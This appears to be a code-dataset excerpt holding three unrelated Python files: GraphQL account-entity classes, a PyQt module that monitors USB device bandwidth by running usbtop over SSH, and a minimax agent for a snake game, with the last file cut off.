from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
            included in the response to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
        provided entity. If none of the provided types match or if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
        # check if it's explicitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
# definitely a dict now, since we check what it was earlier. (present
# for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
    # mypy and the attrs plugin doesn't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
        # ignore unsupported converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| en | 0.804767 | Singleton written in a way mypy can parse. See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions for more details. A singleton to differentiate between omitted vs explicit :obj:`None`. # helper type for entity_converter # type: Union[List[Type[U]], Type[U]] # type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]] Convert a dictionary response into instances of the entity class. Usage: # disambiguates between type_a and type_b based on ``__typename`` converter = entity_converter([TypeA, TypeB]) my_instance = converter({'__typename': 'TypeB'}) XXX: mypy isn't expressive enough to annotate that the return type will be one of the _specific_ arg types and not the most generic bound base. We'll unfortunately have to ``# type: ignore`` on lines that call this. Args: entity_cls: the class (or classes) the value should be converted into. If multiple classes are provided as options, ``__typename`` must be included in the reponse to support disambiguation. Returns: A callable that will convert a dictionary to the right entity type. If more than one entity type is possible, that dictionary must have a ``__typename`` field present, which must match the ``TYPENAME`` on a provided entity. If none of the provided types match of if the fields don't align with the provided entity, a ``TypeError`` is raised. # type: List[Type[U]] # type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted] # check if it's explitly been omitted (don't try to convert those) # check if it's already an entity # definitely a dict now, since we check what it was earlier. (present # for type checking) # if there's more than one possibility for entity classes, pick the # right one based on ``__typename`` # only one option, we don't need an explicit type # type: Type[U] # a few different return types are expected # type: Optional[Type[U]] # type: str The name of the graphql type in the schema. Used for disambiguation when there's more than one possible type being returned. # type: (Type[U], Dict[str, Any]) -> U # If __typename is present, this asserts that it matches this class's # expected typename # convert top-level kwargs from camelCase to snake_case # mypy doesn't like that we're providing kwargs to a type whose init # doesn't accept any kwargs (even though subclasses do have attributes) # type: ignore # type: enums.AccountErrorCode # type: Optional[str] # type: Optional[int] # type: enums.ProviderType # type: str # type: Optional[str] # type: Optional[datetime.datetime] Base class for delete operation payloads. These payloads don't actually have any field information in them. While there's technically a "_" field in the schema, it's only a placeholder to work around the language not supporting empty responses. It has no meaning and will never have a meaningful value. This class has no specific equivalent type, it's just a convenience type for these entities. 
# type: ignore[misc] # type: Account # type: str # type: int # type: ignore[misc] # type: Account # type: ignore[misc] # type: Union[Omitted, Account, AccountError] # mypy and the attrs plugin doens't like the `Omitted` default + converter # stuff # type: ignore # ignore unsupport converter warning # type: ignore[misc] # type: Union[Omitted, AuthorizeAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, VerifyAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, DeleteAccountPayload, AccountError] # type: ignore # type: ignore[misc] # type: Union[Omitted, DeleteAccountKeyPayload, AccountError] # type: ignore # ignore unsupport converter warning # type: ignore[misc] # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError] | 2.312008 | 2 |
library/device.py | lompal/USBIPManager | 24 | 10356 | <gh_stars>10-100
from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
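            # usbtop redraws its table with the ANSI "clear screen + cursor home"
            # escape sequence, so that marker delimits one complete stats snapshot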
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
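            # usbtop redraws its table with the ANSI "clear screen + cursor home"
            # escape sequence, so that marker delimits one complete stats snapshot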
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive() | en | 0.766665 | # noinspection PyPep8Naming PyQt signals for correct daemon device tree calls from a different thread Load daemon as a top-level item - emit the signal Set incoming/outgoing bandwidth - emit the signal Set tooltip for a daemon during capturing operation - emit the signal Set status icon for a daemon during capturing operation - emit the signal # noinspection PyPep8Naming Daemon device bandwidth tree Load daemon as a top-level item - inner function Set incoming/outgoing bandwidth - inner function Set tooltip for a daemon during capturing operation - inner function Set status icon for a daemon during capturing operation - inner function Load daemon as a top-level item from a different thread Set incoming/outgoing bandwidth from a different thread Set status tooltip for a daemon during capturing operation from a different thread Set status icon for a daemon during capturing operation from a different thread Set incoming bandwidth Set outgoing bandwidth # noinspection PyPep8Naming Daemon device bandwidth processing # noinspection PyMethodMayBeStatic Run the USBTOP processing - daemon thread Run the USBTOP processing - inner function Run the USBTOP processing - coroutine Cancel the USBTOP processing - coroutine Run the USBTOP processing - calling coroutine Cancel the USBTOP processing - calling coroutine Check if the USBTOP processing is running | 2.424398 | 2 |
agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 1 | 10357 | <reponame>youkeyao/SJTU-CS410-Snakes-3V3-Group06
DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
def go(state, action, board_height, board_width):
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
    @staticmethod
    def go(state, action, board_height, board_width):
        # The board is toroidal: a move off one edge wraps around to the opposite edge.
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
